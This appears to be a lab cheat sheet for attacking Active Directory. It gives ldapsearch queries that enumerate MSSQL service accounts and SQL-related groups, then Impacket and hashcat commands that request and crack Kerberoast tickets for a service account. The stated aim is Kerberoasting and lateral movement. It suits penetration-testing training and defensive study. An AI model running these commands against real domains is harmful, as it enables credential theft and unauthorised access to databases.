SQL service queries find MSSQL SPNs, SQL-related groups, and database administration groups. These results feed Kerberoasting, SQL authentication testing, and lateral movement through database access.
export DC=10.10.10.200
export BASE='DC=ootw,DC=local'
export DOMAIN=ootw.local
export USER='student'
export PASS='student'
MSSQL SPNs:
ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(samAccountType=805306368)(servicePrincipalName=MSSQLSvc*))' name sAMAccountName servicePrincipalName memberOf adminCount
MSSQL service objects, including computers:
ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(servicePrincipalName=MSSQLSvc*)' name sAMAccountName dNSHostName servicePrincipalName distinguishedName
SQL-related groups:
ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(samAccountType=268435456)(|(name=*SQL*)(name=*DB*)(name=*Database*)))' distinguishedName name member description
Request MSSQL Kerberoast material with Impacket, then crack with Hashcat:
GetUserSPNs.py $DOMAIN/$USER:"$PASS" -dc-ip $DC -request-user svc_sql -outputfile mssql.tgs
hashcat -m 13100 mssql.tgs /usr/share/wordlists/rockyou.txt
PowerShell:
Get-ADObject -LDAPFilter '(servicePrincipalName=MSSQLSvc*)' -Properties servicePrincipalName,dNSHostName,memberOf,adminCount |
Select-Object Name,ObjectClass,dNSHostName,servicePrincipalName,memberOf,adminCount